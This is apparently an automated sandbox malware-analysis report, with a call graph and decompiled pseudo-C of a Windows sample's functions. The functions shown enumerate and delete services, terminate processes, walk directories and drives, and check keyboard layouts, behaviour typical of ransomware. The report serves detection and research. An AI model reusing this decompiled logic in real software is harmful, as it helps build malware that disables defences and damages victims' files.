5145->5143 5146 9b5b70 ControlService 5145->5146 5146->5147 5148 9b5b8e DeleteService 5146->5148 5147->5139 5147->5143 5147->5145 5152 9b5bbc OpenProcess 5147->5152 5165 9b4b05 5147->5165 5174 9b4ab8 OpenProcess 5147->5174 5148->5143 5149 9b5b99 CloseServiceHandle 5148->5149 5149->5147 5152->5147 5153 9b5bcd TerminateProcess 5152->5153 5154 9b4bee FindCloseChangeNotification 5153->5154 5154->5147 5155->5114 5157 9b67c7 9 API calls 5156->5157 5158 9b30b0 5157->5158 5159 9b6a62 9 API calls 5158->5159 5160 9b3100 5159->5160 5160->5102 5161->5138 5178 9b49d3 5162->5178 5166 9b4b1b 5165->5166 5168 9b4b20 5165->5168 5167 9b494c 3 API calls 5166->5167 5167->5168 5169 9b4b33 OpenProcess 5168->5169 5170 9b4b4a QueryFullProcessImageNameW 5169->5170 5173 9b4b7d 5169->5173 5171 9b4bee FindCloseChangeNotification 5170->5171 5172 9b4b63 PathFindFileNameW 5171->5172 5172->5173 5173->5147 5175 9b4b00 5174->5175 5176 9b4ad7 GetExitCodeProcess Sleep 5174->5176 5175->5147 5176->5176 5177 9b4af6 CloseHandle 5176->5177 5177->5175 5179 9b49dd VerSetConditionMask VerifyVersionInfoW 5178->5179 5179->5141 5181 9b54cc 9 API calls 5180->5181 5182 9b45e9 5181->5182 5183 9b494c 3 API calls 5182->5183 5196 9b468a 5182->5196 5185 9b4603 5183->5185 5184 9b54cc 9 API calls 5184->5185 5185->5184 5186 9b464f 5185->5186 5185->5196 5214 9b57a9 GetTempPathW 5186->5214 5188 9b467e 5189 9b4684 5188->5189 5191 9b468c 5188->5191 5190 9b4999 RtlFreeHeap 5189->5190 5190->5196 5192 9b494c 3 API calls 5191->5192 5193 9b46a9 5192->5193 5194 9b4999 RtlFreeHeap 5193->5194 5193->5196 5195 9b46b8 5194->5195 5197 9b4999 RtlFreeHeap 5195->5197 5196->4847 5197->5196 5200 9b4444 LocalAlloc 5198->5200 5212 9b45c2 KiUserCallbackDispatcher 5198->5212 5201 9b44cb GlobalAlloc 5200->5201 5202 9b44c4 5200->5202 5203 9b4501 GetDIBits 5201->5203 5201->5212 5202->5201 5204 9b451e CreateFileW 5203->5204 5203->5212 5205 9b4541 WriteFile 5204->5205 5204->5212 5206 9b4587 WriteFile 5205->5206 5207 9b45a4 5205->5207 5206->5207 5208 9b45a7 WriteFile 5206->5208 5210 9b4bee FindCloseChangeNotification 5207->5210 5208->5207 5209 9b45c5 5208->5209 5211 9b4bee FindCloseChangeNotification 5209->5211 5210->5212 5213 9b45ca GlobalFree 5211->5213 5212->4854 5213->5212 5215 9b57ba 5214->5215 5216 9b57bc 5214->5216 5215->5188 5217 9b494c 3 API calls 5216->5217 5218 9b57c6 5217->5218 5219 9b57cd GetTempPathW 5218->5219 5222 9b57df 5218->5222 5220 9b57d9 5219->5220 5219->5222 5221 9b4999 RtlFreeHeap 5220->5221 5221->5222 5222->5188 5228 9b64b9 5223->5228 5230 9b6473 5223->5230 5225 9b64c4 5238 9b4928 HeapDestroy 5225->5238 5227 9b64cb 5227->4859 5237 9b4936 RtlFreeHeap 5228->5237 5229 9b4999 RtlFreeHeap 5229->5230 5230->5228 5230->5229 5236 9b4936 RtlFreeHeap 5230->5236 5233 9b1450 5232->5233 5235 9b1f6c 5232->5235 5233->4864 5234 9b4999 RtlFreeHeap 5234->5235 5235->5233 5235->5234 5236->5230 5237->5225 5238->5227 5240 9b3971 5239->5240 5241 9b39e3 SysAllocString 5240->5241 5243 9b3975 5240->5243 5242 9b3a0c SysFreeString 5241->5242 5242->5243 5244 9b3a2f 5242->5244 5245 9b3ab5 SysAllocString SysAllocString 5244->5245 5246 9b3aed SysFreeString SysFreeString 5245->5246 5246->5243 5247 9b3b06 GetCurrentProcess WaitForSingleObject 5246->5247 5247->5243 5249 9b2937 5248->5249 5254 9b293b 5249->5254 5259 9b5327 GetNativeSystemInfo 5249->5259 5251 9b296d 5252 9b297a VariantInit 5251->5252 5256 9b29a8 5251->5256 5253 9b29a2 VariantClear 5252->5253 5253->5256 5255 9b2b38 VariantClear 5255->5256 5256->5254 5256->5255 5257 9b2adb wsprintfW 5256->5257 5258 9b2b29 VariantClear 5256->5258 5257->5256 5257->5258 5258->5256 5259->5251 5261 9b4a9a GetKeyboardLayoutList 5260->5261 5261->4263 5261->4264 5262->4275 5263->4278 5265 9b5425 4 API calls 5264->5265 5266 9b50a9 OpenProcess 5265->5266 5266->4298 5266->4303 5350 9b1194 5351 9b5cdd 6 API calls 5350->5351 5352 9b11a3 5351->5352 5353 9b11ca 5352->5353 5354 9b5d2f 6 API calls 5352->5354 5355 9b11bb 5354->5355 5356 9b4999 RtlFreeHeap 5355->5356 5357 9b11c3 5356->5357 5357->5353 5358 9b4999 RtlFreeHeap 5357->5358 5358->5353 5359 9b390f 5360 9b391a 5359->5360 5361 9b391e 5359->5361 5361->5360 5363 9b7919 PathFindExtensionW 5361->5363 5364 9b792e 5363->5364 5364->5360 5365 9b10c3 5366 9b5cdd 6 API calls 5365->5366 5367 9b10d2 5366->5367 5368 9b10f2 5367->5368 5369 9b5d2f 6 API calls 5367->5369 5370 9b10e7 5369->5370 5371 9b4999 RtlFreeHeap 5370->5371 5371->5368 5396 9b6f63 5399 9b7056 5396->5399 5402 9b5083 GetPEB 5399->5402 5401 9b6f6d 5402->5401 4079 9b27a0 4081 9b2913 4079->4081 4084 9b27b5 4079->4084 4080 9b27f7 VariantClear 4080->4084 4082 9b28ff VariantClear 4082->4084 4083 9b2897 VariantClear 4083->4084 4084->4080 4084->4081 4084->4082 4084->4083 4085 9b28df StrToIntW VariantClear 4084->4085 4086 9b28f8 4084->4086 4085->4084 4086->4082 4088 9b4199 OpenProcess 4086->4088 4089 9b41bf 4088->4089 4090 9b41b0 TerminateProcess 4088->4090 4089->4086 4092 9b4bee 4090->4092 4093 9b4c00 4092->4093 4094 9b4bf7 FindCloseChangeNotification 4092->4094 4093->4089 4094->4093 5403 9b6fe0 5404 9b7056 GetPEB 5403->5404 5405 9b6fea 5404->5405

            Executed Functions

            Function 009B3B6E, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 141serviceCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 41%
            			E009B3B6E() {
				char _v8;
				char _v12;
				void* _v16;
				struct _SERVICE_STATUS _v20;
				short** _v24;
				short* _v28;
				void _v56;
				struct _SERVICE_STATUS _v60;
				void* _t28;
				struct _SERVICE_STATUS _t37;
				intOrPtr* _t40;
				struct _SERVICE_STATUS _t43;
				struct _SERVICE_STATUS _t45;
				void* _t46;
				int _t50;
				void* _t58;
				signed int _t63;
				void* _t65;
				short** _t67;
				void* _t71;
				struct _SERVICE_STATUS _t72;
				void* _t74;

				_t72 = 0;
				_t28 = OpenSCManagerW(0, L"ServicesActive", 4); // executed
				_t58 = _t28;
				if(_t58 != 0) {
					_push(0);
					_push(0);
					_v8 = 0;
					_push( &_v12);
					_v12 = 0;
					_push( &_v8);
					_push(0);
					_push(0);
					_push(1);
					_push(0x30);
					_push(0);
					_push(_t58);
					if( *0x9c12b8() == 0 || RtlGetLastWin32Error() == 0xea) {
						_t67 = E009B494C(_v8);
						_v24 = _t67;
						if(_t67 != 0) {
							_push(_t72);
							_push(_t72);
							_push( &_v12);
							_push( &_v8);
							_push(_v8);
							_push(_t67);
							_push(1);
							_push(0x30);
							_push(_t72);
							_push(_t58);
							if( *0x9c12b8() == 0) {
								L25:
								CloseServiceHandle(_t58);
								_t37 = _t72;
								L26:
								return _t37;
							}
							_v20 = _t72;
							if(_v12 <= _t72) {
								L24:
								_t72 = 1;
								goto L25;
							} else {
								goto L9;
							}
							do {
								L9:
								_v28 =  *_t67;
								E009B60E8( *_t67);
								_t40 =  *0x9c22d0; // 0x0
								while(1) {
									_v16 = _t40;
									if(_t40 == 0) {
										break;
									}
									if(E009B5EA0( *_t40, _v28) != 0) {
										_t43 = 1;
										L14:
										if(_t43 == 0) {
											goto L19;
										}
										_t46 = OpenServiceW(_t58,  *_t67, 0x10020); // executed
										_t65 = _t46;
										_v16 = _t65;
										if(_t65 == 0) {
											goto L24;
										}
										_t63 = 6;
										_v60 = _t72;
										memset( &_v56, 0, _t63 << 2);
										_t74 = _t74 + 0xc;
										_t50 = ControlService(_t65, 1,  &_v60);
										_t71 = _v16;
										_push(_t71);
										if(_t50 == 0) {
											L23:
											CloseServiceHandle();
											goto L24;
										}
										if(DeleteService() == 0) {
											_push(_t71);
											goto L23;
										}
										_t67 = _v24;
										goto L19;
									}
									_t40 =  *((intOrPtr*)(_v16 + 4));
								}
								_t43 = _t72;
								goto L14;
								L19:
								_t67 =  &(_t67[0xb]);
								_t45 = _v20 + 1;
								_v24 = _t67;
								_v20 = _t45;
							} while (_t45 < _v12);
							goto L24;
						}
						CloseServiceHandle(_t58);
						_t37 = 0;
						goto L26;
					} else {
						CloseServiceHandle(_t58);
						goto L1;
					}
				}
				L1:
				return 0;
			}

























            0x009b3b7d
            0x009b3b80
            0x009b3b86
            0x009b3b8a
            0x009b3b93
            0x009b3b94
            0x009b3b98
            0x009b3b9b
            0x009b3b9f
            0x009b3ba2
            0x009b3ba3
            0x009b3ba4
            0x009b3ba5
            0x009b3ba7
            0x009b3ba9
            0x009b3baa
            0x009b3bb3
            0x009b3bd3
            0x009b3bd5
            0x009b3bdb
            0x009b3beb
            0x009b3bec
            0x009b3bf0
            0x009b3bf4
            0x009b3bf5
            0x009b3bf8
            0x009b3bf9
            0x009b3bfb
            0x009b3bfd
            0x009b3bfe
            0x009b3c07
            0x009b3cbc
            0x009b3cbd
            0x009b3cc3
            0x009b3cc5
            0x00000000
            0x009b3cc5
            0x009b3c0d
            0x009b3c13
            0x009b3cb9
            0x009b3cbb
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x009b3c19
            0x009b3c19
            0x009b3c1c
            0x009b3c1f
            0x009b3c24
            0x009b3c42
            0x009b3c42
            0x009b3c47
            0x00000000
            0x00000000
            0x009b3c3a
            0x009b3caf
            0x009b3c4b
            0x009b3c4d
            0x00000000
            0x00000000
            0x009b3c57
            0x009b3c5d
            0x009b3c5f
            0x009b3c64
            0x00000000
            0x00000000
            0x009b3c68
            0x009b3c6b
            0x009b3c71
            0x009b3c71
            0x009b3c7a
            0x009b3c80
            0x009b3c83
            0x009b3c86
            0x009b3cb3
            0x009b3cb3
            0x00000000
            0x009b3cb3
            0x009b3c90
            0x009b3cb2
            0x00000000
            0x009b3cb2
            0x009b3c92
            0x00000000
            0x009b3c92
            0x009b3c3f
            0x009b3c3f
            0x009b3c49
            0x00000000
            0x009b3c95
            0x009b3c98
            0x009b3c9b
            0x009b3c9c
            0x009b3c9f
            0x009b3ca2
            0x00000000
            0x009b3cab
            0x009b3bde
            0x009b3be4
            0x00000000
            0x009b3bc1
            0x009b3bc2
            0x00000000
            0x009b3bc2
            0x009b3bb3
            0x009b3b8c
            0x00000000

            APIs
            • OpenSCManagerW.SECHOST(00000000,ServicesActive,00000004,00000000,00000000), ref: 009B3B80
            • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000001,00000000,00000000,?,?,00000000,00000000), ref: 009B3BAB
            • RtlGetLastWin32Error.NTDLL ref: 009B3BB5
            • CloseServiceHandle.ADVAPI32(00000000), ref: 009B3BC2
              • Part of subcall function 009B494C: HeapCreate.KERNELBASE(00000000,00100000,00000000,?,009B1C68,?,?,009B150F), ref: 009B4961
              • Part of subcall function 009B494C: GetProcessHeap.KERNEL32(?,009B1C68,?,?,009B150F), ref: 009B4970
            • CloseServiceHandle.ADVAPI32(00000000), ref: 009B3BDE
            • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000001,00000000,?,?,?,00000000,00000000), ref: 009B3BFF
            • OpenServiceW.ADVAPI32(00000000,00000000,00010020), ref: 009B3C57
            • ControlService.ADVAPI32(00000000,00000001,?), ref: 009B3C7A
            • DeleteService.ADVAPI32(?), ref: 009B3C88
            • CloseServiceHandle.ADVAPI32(00000000), ref: 009B3CBD
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Service$CloseHandle$EnumHeapOpenServicesStatus$ControlCreateDeleteErrorLastManagerProcessWin32
            • String ID: ServicesActive
            • API String ID: 2778422472-3071072050
            • Opcode ID: fcf80861785c6388d34fd47a7e56419dc5dedd6de5debf317fc4d9357a164e18
            • Instruction ID: 2254b08eca235ab977ff7298242495511a0b3ad1c538facffbeedab9733bb13a
            • Opcode Fuzzy Hash: fcf80861785c6388d34fd47a7e56419dc5dedd6de5debf317fc4d9357a164e18
            • Instruction Fuzzy Hash: 66417F75E04219BBDB20DBA5DE48EEFBFBCEF45760F108416B905F2251E6309A40DBA4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B766A, Relevance: 6.2, APIs: 4, Instructions: 193COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 395 9b766a-9b7695 397 9b786b-9b786e 395->397 398 9b769b-9b76aa call 9b7944 call 9b2d02 395->398 400 9b76bb-9b76c1 397->400 401 9b7874 397->401 411 9b76ad-9b76b6 398->411 403 9b76c3-9b76f7 call 9b61f8 call 9b4999 * 2 400->403 404 9b7702-9b7704 400->404 405 9b788a-9b788c 401->405 427 9b76f9 403->427 428 9b76fc-9b7701 403->428 404->405 409 9b770a-9b7735 call 9b62a1 call 9b6116 call 9b5408 404->409 406 9b788e-9b7894 405->406 407 9b7876-9b7889 call 9b4999 * 2 405->407 407->405 429 9b7749-9b774b FindFirstFileW 409->429 430 9b7737-9b7747 FindFirstFileExW 409->430 415 9b7868 411->415 415->397 427->428 428->404 431 9b7751-9b7757 429->431 430->431 431->397 432 9b775d 431->432 433 9b775f-9b7774 call 9b6197 432->433 436 9b777a-9b778f call 9b6197 433->436 437 9b7846-9b7849 433->437 436->437 442 9b7795-9b779f 436->442 438 9b784b-9b785b FindNextFileW 437->438 439 9b7861-9b7862 FindClose 437->439 438->433 438->439 439->415 442->437 443 9b77a5-9b77c1 call 9b61f8 442->443 446 9b7803-9b7827 443->446 447 9b77c3-9b77de call 9b6116 443->447 446->437 451 9b7829-9b783a call 9b38a7 446->451 447->437 454 9b77e0-9b77f5 call 9b7944 call 9b2d02 447->454 453 9b783d-9b7843 451->453 453->437 457 9b77f8-9b7801 454->457 457->437
            C-Code - Quality: 79%
            			E009B766A(WCHAR* _a4, int _a8) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				struct _WIN32_FIND_DATAW _v620;
				int _t66;
				signed int _t68;
				void* _t70;
				signed int _t73;
				int _t75;
				signed int _t77;
				intOrPtr _t82;
				signed int _t84;
				void* _t86;
				signed int _t89;
				void* _t93;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t103;
				void* _t104;
				signed int _t112;
				int _t119;
				signed int* _t120;
				WCHAR* _t121;
				intOrPtr* _t122;
				intOrPtr* _t123;
				intOrPtr* _t124;

				_t121 = _a4;
				_t120 = _a8;
				_t103 = 0;
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_t120[1](_t121, 0);
				if(0 == 0) {
					goto L24;
				} else {
					E009B7944( &_v20, _t121);
					_t66 = _t120[0xa](_t120[3], _t121, 0);
					_t124 = _t124 + 0x14;
					_t120[6] = _t120[6] + _t66;
					asm("adc [edi+0x1c], edx");
					L23:
					_t103 = _v12;
					L24:
					while( *_t120 == 0) {
						_t66 = _v20 | _v16;
						__eflags = _t66;
						if(_t66 != 0) {
							E009B61F8(_t121,  *_t103);
							_t123 = _t103;
							_t103 =  *((intOrPtr*)(_t103 + 4));
							_v12 = _t103;
							E009B4999( *_t123);
							E009B4999(_t123);
							_t124 = _t124 + 0x10;
							_t112 = _v16;
							_t98 = _v20 + 0xffffffff;
							_v20 = _t98;
							asm("adc ecx, 0xffffffff");
							_t99 = _t98 | _t112;
							__eflags = _t99;
							_v16 = _t112;
							if(_t99 == 0) {
								_t21 =  &_v8;
								 *_t21 = _v8 & _t99;
								__eflags =  *_t21;
							}
							_t121 = _a4;
							_t66 = 1;
							__eflags = 1;
						}
						__eflags = _t66;
						if(_t66 == 0) {
							L27:
							while(_t103 != 0) {
								_t122 = _t103;
								_t103 =  *((intOrPtr*)(_t103 + 4));
								E009B4999( *_t122);
								_t66 = E009B4999(_t122);
							}
							return _t66;
						}
						_t68 = E009B62A1(_t121);
						 *_t124 = 0x9bd2b0;
						_push(_t121);
						_v24 = _t68;
						E009B6116(__eflags);
						_t70 = E009B5408();
						__eflags = _t70 - 0x601;
						if(_t70 < 0x601) {
							_t66 = FindFirstFileW(_t121,  &_v620);
						} else {
							_t66 = FindFirstFileExW(_t121, 1,  &_v620, 0, 0, 2); // executed
						}
						_a8 = _t66;
						__eflags = _t66 - 0xffffffff;
						if(_t66 == 0xffffffff) {
							continue;
						} else {
							_t104 = _t66;
							while(1) {
								_t73 = E009B6197( &(_v620.cFileName), 0x9bd03c);
								__eflags = _t73;
								if(_t73 != 0) {
									_t77 = E009B6197( &(_v620.cFileName), 0x9bd2a8);
									__eflags = _t77;
									if(_t77 != 0) {
										__eflags = _v620.dwFileAttributes & 0x00000400;
										if((_v620.dwFileAttributes & 0x00000400) == 0) {
											E009B61F8( &(_t121[_v24]),  &(_v620.cFileName));
											__eflags = _v620.dwFileAttributes & 0x00000010;
											if(__eflags == 0) {
												_t119 = _v620.nFileSizeHigh;
												_t82 = _v620.nFileSizeLow;
												_v28 = _t82;
												_a8 = _t119;
												_t84 = _t120[2](_t121,  &(_v620.cFileName), _t82, _t119);
												_t124 = _t124 + 0x10;
												__eflags = _t84;
												if(_t84 != 0) {
													_t86 = _t120[0xb](_t120[4], _t121,  &(_v620.cFileName), _v28, _a8);
													_t124 = _t124 + 0x14;
													_t120[8] = _t120[8] + _t86;
													asm("adc [edi+0x24], edx");
												}
											} else {
												E009B6116(__eflags, _t121, 0x9bd2b4);
												_t89 = _t120[1](_t121,  &(_v620.cFileName));
												_t124 = _t124 + 0x10;
												__eflags = _t89;
												if(_t89 != 0) {
													E009B7944( &_v20, _t121);
													_t93 = _t120[0xa](_t120[3], _t121,  &(_v620.cFileName));
													_t124 = _t124 + 0x14;
													_t120[6] = _t120[6] + _t93;
													asm("adc [edi+0x1c], edx");
												}
											}
										}
									}
								}
								__eflags =  *_t120;
								if( *_t120 != 0) {
									break;
								}
								_t75 = FindNextFileW(_t104,  &_v620); // executed
								__eflags = _t75;
								if(_t75 != 0) {
									continue;
								}
								break;
							}
							_t66 = FindClose(_t104); // executed
							goto L23;
						}
					}
					goto L27;
				}
			}
































            0x009b7675
            0x009b767b
            0x009b767e
            0x009b7682
            0x009b7685
            0x009b7688
            0x009b768b
            0x009b768e
            0x009b7695
            0x00000000
            0x009b769b
            0x009b76a0
            0x009b76aa
            0x009b76ad
            0x009b76b0
            0x009b76b3
            0x009b7868
            0x009b7868
            0x00000000
            0x009b786b
            0x009b76be
            0x009b76be
            0x009b76c1
            0x009b76c6
            0x009b76cb
            0x009b76cd
            0x009b76d0
            0x009b76d5
            0x009b76db
            0x009b76e3
            0x009b76e6
            0x009b76e9
            0x009b76ec
            0x009b76ef
            0x009b76f2
            0x009b76f2
            0x009b76f4
            0x009b76f7
            0x009b76f9
            0x009b76f9
            0x009b76f9
            0x009b76f9
            0x009b76fc
            0x009b7701
            0x009b7701
            0x009b7701
            0x009b7702
            0x009b7704
            0x00000000
            0x009b788a
            0x009b7876
            0x009b7878
            0x009b787d
            0x009b7883
            0x009b7889
            0x009b7894
            0x009b7894
            0x009b770b
            0x009b7710
            0x009b7717
            0x009b7718
            0x009b771b
            0x009b7722
            0x009b772c
            0x009b7735
            0x009b774b
            0x009b7737
            0x009b7741
            0x009b7741
            0x009b7751
            0x009b7754
            0x009b7757
            0x00000000
            0x009b775d
            0x009b775d
            0x009b775f
            0x009b776b
            0x009b7772
            0x009b7774
            0x009b7786
            0x009b778d
            0x009b778f
            0x009b7795
            0x009b779f
            0x009b77b3
            0x009b77b8
            0x009b77c1
            0x009b7803
            0x009b7809
            0x009b7811
            0x009b781c
            0x009b781f
            0x009b7822
            0x009b7825
            0x009b7827
            0x009b783a
            0x009b783d
            0x009b7840
            0x009b7843
            0x009b7843
            0x009b77c3
            0x009b77c9
            0x009b77d6
            0x009b77d9
            0x009b77dc
            0x009b77de
            0x009b77e5
            0x009b77f5
            0x009b77f8
            0x009b77fb
            0x009b77fe
            0x009b77fe
            0x009b77de
            0x009b77c1
            0x009b779f
            0x009b778f
            0x009b7846
            0x009b7849
            0x00000000
            0x00000000
            0x009b7853
            0x009b7859
            0x009b785b
            0x00000000
            0x00000000
            0x00000000
            0x009b785b
            0x009b7862
            0x00000000
            0x009b7862
            0x009b7757
            0x00000000
            0x009b7874

            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4f593e2b685eb813b2f1837de58ad48f358120d7a6595127c0024425e12505e0
            • Instruction ID: 4c4cfa9765967d5cc9df452610a9d0cb0edb344054db4ba68fcc25111abd6110
            • Opcode Fuzzy Hash: 4f593e2b685eb813b2f1837de58ad48f358120d7a6595127c0024425e12505e0
            • Instruction Fuzzy Hash: 4061827190461AAFDB10AFA4CD89AEEB7BCFF45330F10426AF915E2141E775EA50CB90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B595D, Relevance: 6.0, APIs: 4, Instructions: 12timesleepCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B595D() {
				long _t3;
				long _t4;

				timeBeginPeriod(1);
				_t4 = timeGetTime();
				do {
					Sleep(1); // executed
					_t3 = timeGetTime();
				} while (_t4 == _t3);
				return _t3;
			}





            0x009b5960
            0x009b596c
            0x009b596e
            0x009b5970
            0x009b5976
            0x009b597c
            0x009b5981

            APIs
            • timeBeginPeriod.WINMM(00000001,?,009B58C9,00000000,00000000,00000000,?,00000030,00000000,?,?,009B6829,?,00000020,00000000), ref: 009B5960
            • timeGetTime.WINMM(?,009B6829,?,00000020,00000000,?,009B67D2,?,?,009B24D2,?,009C2180), ref: 009B5966
            • Sleep.KERNELBASE(00000001,?,009B6829,?,00000020,00000000,?,009B67D2,?,?,009B24D2,?,009C2180), ref: 009B5970
            • timeGetTime.WINMM(?,009B6829,?,00000020,00000000,?,009B67D2,?,?,009B24D2,?,009C2180), ref: 009B5976
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: time$Time$BeginPeriodSleep
            • String ID:
            • API String ID: 4118631919-0
            • Opcode ID: 1978574dce5d1b3665b15097c6e43123c3994ea4f15310be8ba4d800974a421e
            • Instruction ID: f8bed29b3fbbf41926827d60f6ee811ba7ef921356ffc42fe77f7bdda777c8f1
            • Opcode Fuzzy Hash: 1978574dce5d1b3665b15097c6e43123c3994ea4f15310be8ba4d800974a421e
            • Instruction Fuzzy Hash: 21C012358181508FD3103760BC0CFD97A70AB067E1F450250F917D50E3CA514CC1969C
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B4CD4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B4CD4(signed int* _a4) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				short _v20;
				union _ULARGE_INTEGER _v28;
				intOrPtr _t23;
				int _t31;
				short _t34;
				long _t40;
				void* _t41;
				short _t42;
				void* _t45;
				signed int _t46;
				void* _t47;
				union _ULARGE_INTEGER* _t49;
				signed int _t50;

				_t46 = 0;
				_t50 = 0;
				_v8 = 0;
				_t41 = 0;
				_t47 = 0x5a;
				L1:
				while(1) {
					if(_t41 == 0) {
						L5:
						_t42 =  *0x9bd144; // 0x3a0041
						_t23 =  *0x9bd148; // 0x5c
						_v20 = _t42;
						_v16 = _t23;
						if(_t42 > _t47) {
							L14:
							_t46 = _v8;
							_t41 = _t41 + 1;
							if(_t41 > 1) {
								L17:
								return _t46;
							}
							continue;
						}
						_t6 = _t46 + 0xe; // 0xe
						_t49 = _t6 + _t50 * 0x16;
						do {
							_t31 = GetDriveTypeW( &_v20); // executed
							_v12 = _t31;
							if(E009B7906(_t31) != 0) {
								if(_t41 != 0) {
									 *((short*)(_t49 - 0xe)) = _v20;
									 *(_t49 - 0xc) = _v12;
									_t13 = _t49 - 8; // 0x6
									_t40 = GetDiskFreeSpaceExW( &_v20,  &_v28, _t13, _t49); // executed
									if(_t40 == 0) {
										_t49->LowPart = _t40;
										_t49->LowPart.HighPart = _t40;
										 *(_t49 - 8) = _t40;
										 *(_t49 - 4) = _t40;
									}
								}
								_t50 = _t50 + 1;
								_t49 = _t49 + 0x16;
							}
							_t34 = _v20 + 1;
							_t45 = 0x5a;
							_v20 = _t34;
						} while (_t34 <= _t45);
						_t47 = _t45;
						goto L14;
					}
					if(_t50 == 0) {
						L16:
						 *_a4 =  *_a4 & 0x00000000;
						goto L17;
					}
					_t46 = E009B494C(_t50 * 0x16);
					_v8 = _t46;
					if(_t46 == 0) {
						goto L16;
					}
					 *_a4 = _t50;
					_t50 = 0;
					goto L5;
				}
			}



















            0x009b4cdd
            0x009b4cdf
            0x009b4ce3
            0x009b4ce6
            0x009b4ce8
            0x00000000
            0x009b4ce9
            0x009b4ceb
            0x009b4d13
            0x009b4d13
            0x009b4d19
            0x009b4d1e
            0x009b4d21
            0x009b4d27
            0x009b4d95
            0x009b4d95
            0x009b4d98
            0x009b4d9c
            0x009b4dab
            0x009b4db1
            0x009b4db1
            0x00000000
            0x009b4d9e
            0x009b4d2c
            0x009b4d2f
            0x009b4d31
            0x009b4d35
            0x009b4d3c
            0x009b4d47
            0x009b4d4b
            0x009b4d51
            0x009b4d58
            0x009b4d5b
            0x009b4d68
            0x009b4d70
            0x009b4d72
            0x009b4d74
            0x009b4d77
            0x009b4d7a
            0x009b4d7a
            0x009b4d70
            0x009b4d7d
            0x009b4d7e
            0x009b4d7e
            0x009b4d87
            0x009b4d89
            0x009b4d8a
            0x009b4d8e
            0x009b4d94
            0x00000000
            0x009b4d94
            0x009b4cef
            0x009b4da3
            0x009b4da6
            0x00000000
            0x009b4da6
            0x009b4cfe
            0x009b4d00
            0x009b4d06
            0x00000000
            0x00000000
            0x009b4d0f
            0x009b4d11
            0x00000000
            0x009b4d11

            APIs
            • GetDriveTypeW.KERNELBASE(?,00000001,00000000,009C0270,?,?,?,?,009B1A3E,?), ref: 009B4D35
            • GetDiskFreeSpaceExW.KERNELBASE(?,?,00000006,0000000E,?,?,?,?,009B1A3E,?), ref: 009B4D68
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: DiskDriveFreeSpaceType
            • String ID: A:\
            • API String ID: 1419299958-3379428675
            • Opcode ID: a6f035e20d8e09f0a87cec9f1aaee591317ead2a2231ad9b42debbdf80bd0c75
            • Instruction ID: e1d28b22aa0f173a875134d698f9e034c72ebc49f1549861a199ec84a8374082
            • Opcode Fuzzy Hash: a6f035e20d8e09f0a87cec9f1aaee591317ead2a2231ad9b42debbdf80bd0c75
